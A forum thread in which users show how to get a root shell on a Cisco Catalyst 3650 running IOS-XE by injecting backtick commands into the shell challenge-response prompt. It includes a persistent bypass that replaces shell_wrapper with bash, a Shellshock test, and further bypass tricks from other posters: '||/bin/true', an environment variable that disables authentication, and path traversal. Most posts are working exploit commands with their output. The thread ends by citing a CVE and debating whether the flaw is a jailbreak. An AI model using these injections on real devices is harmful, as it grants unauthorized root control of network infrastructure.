dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
6981

kamikatze
join:2007-11-02

kamikatze

Member

[HELP] Catalyst-3650#request system shell

Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
 

I remember being able to get through to the shell by entering something trivial like '/bin/sh' instead. I am sure it wasn't a dream but i clearly remember i didn't write it down because i'm foolish like that..

So how do i drop into bash from IOS-XE on a Cisco Catalyst 3650?

Switch Ports Model              SW Version        SW Image              Mode
------ ----- -----              ----------        ----------            ----
*    1 28    WS-C3650-24PS      03.03.03SE        cat3k_caa-universalk9 INSTALL
 
kamikatze

4 edits

kamikatze

Member

Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 438e1fd36da9cfdb61e655353a48bb9cf69f274ab2d2[..]
Please enter the shell access response based on the above challenge 
(Press "Enter" when done or to quit.):
`/bin/sh`
sh-3.2# uname -a
sh-3.2#
sh-3.2# uname -2323
uname: invalid option -- '2'
Try `uname --help' for more information.
 
           AHA SO WE HAVE STDERR, but not STDOUT..
 
sh-3.2# ls
sh-3.2# pwd
sh-3.2# whoami
sh-3.2# exit
exit
Key verification failed
 

Alright then, let's go again. More, code execution before key verification. Nice.
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS       config     hugepages  lic0        rommon_to_env  sys     webui
RP_0_0_cli  crashinfo  include    lic1        root           tftp
auto        dev        install    lkern_init  sbin           tmp
bin         drec0      isan       misc        selinux        ucode0
bsn         epc        issu       mnt         share          usr
chasfs      etc        lib        obfl0       space          var
common      flash      lib32      proc        spi            vol
bash-3.2# whoami
root
bash-3.2# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/bshell.sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[..]
 

Cisco please don't fix this or i will never ever upgrade this image.

A silly one:
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
Switch#
 
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
 
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
 
 

Uh.. netcat is there. I'm starting to have second thoughts if posting this on open waters is a good idea..

bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
 

Bigzizzzle
Premium Member
join:2005-01-27
Beverly Hills, CA

1 edit

Bigzizzzle to kamikatze

Premium Member

to kamikatze
Im confused here.

Are you saying you went up cisco's skirt and grabed a fist full of balls?

Hidden packages?

Akin to the being in the shell of JunOS (outside) CLI.

kamikatze
join:2007-11-02

kamikatze

Member

Yes indeed. But you can do this without fuss on the ASR1k, i'm not sure what's with all the "security" here on this little Cat 3k.
aryoba
MVM
join:2002-08-22

aryoba to kamikatze

MVM

to kamikatze
said by kamikatze:

[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

What did you do to fix the "Key verification failed" error situation?

kamikatze
join:2007-11-02

kamikatze

Member

This:
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
 

I guess Cisco isn't big on input validation as ` isn't escaped, so i'm still inside the Key verification function.
meta
join:2004-12-27
00000

meta

Member

Look at their callmanager vulnerabilities, most linux-based platforms they produce are usually swiss cheese with regard to security.
HELLFIRE
MVM
join:2009-11-25

HELLFIRE to kamikatze

MVM

to kamikatze
...watching this with some interest... just from a "wow, I did not know that" perspective.

Regards
markysharkey
Premium Member
join:2012-12-20
united kingd

markysharkey

Premium Member

said by HELLFIRE:

...watching this with some interest... just from a "wow, I did not know that" perspective.

+ 1

kamikatze
join:2007-11-02

1 edit

kamikatze to HELLFIRE

Member

to HELLFIRE
Sneak preview:

[EXTRA]    Building a toolchain for:                  
[EXTRA]      build  = x86_64-unknown-linux-gnu 
[EXTRA]      host   = x86_64-unknown-linux-gnu 
[EXTRA]      target = mips-unknown-elf            
 

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped
 

Stay tuned. Returning next week. Holidays.

----
In other news.
Please enter the shell access response based on the above 
challenge (Press "Enter" when done or to quit.):
`sh 1>&2`
sh-3.2# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
 
But of course, this goes without saying.
kamikatze

kamikatze to HELLFIRE

Member

to HELLFIRE
Holy crap i did it :)

First i got rid of the annoying RSA challenge altogether.
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: a99bac81d1ea605579e81d1d5[..]
Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.):
`bash -c "mv /usr/binos/bin/shell_wrapper /tmp/ohboy; ln -s /bin/bash /usr/binos/bin/shell_wrapper; exit"`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
 
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
[Switch:/]$ whoami ; uname -a
root
Linux Switch 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
 

And then..

»youtu.be/-qbmKYQ2jCA


mirror:

vimeo.com/111153099


Full cross compile story here:
»stackoverflow.com/questi ··· 26789949
HELLFIRE
MVM
join:2009-11-25

HELLFIRE to kamikatze

MVM

to kamikatze
Anything programming or *nix makes my brain break... but I'm still watching with interest. Enjoy the vacation kamikatze See Profile and keep us posted!

Regards

lanaaaaaa
@91.198.120.x

lanaaaaaa to kamikatze

Anon

to kamikatze
I wish you hadn't gone public with this, so rest of us could have enjoyed our extra debugging toolset. It's quite easy to fix this so that linux shell stops working.

So when you request shell following thing happens:

a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k from /dev/mtdblock6, signs challenge, compares to response and return 0 if it is valid, other wise
c) so anything like ||/bin/true will work just fine

shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment

mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion

you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ sop copy foo ../../etc would copy foo to /etc

kamikatze
join:2007-11-02

kamikatze

Member

»web.nvd.nist.gov/view/vu ··· 014-7990

It happened.

Sure, some might call it 'extra debugging toolset'. But let me take the party pooper role and call it what it is, a blatant security hole.

Lanaaaaa
@91.198.120.x

Lanaaaaa

Anon

I disagree that it is a security hole.

You have to have access to the device already to call the linux CLI. I'd compare it to 'jailbreak', you're getting access to the system you already paid for, access you should have had to begin with.

Some other IOS-XE platforms have not restricted the access. IOS-XR still allows openly access to QNX shell. JunOS still allows access to FreeBSD shell (albeit binaries are signed for few years now, which hurt legit use-cases).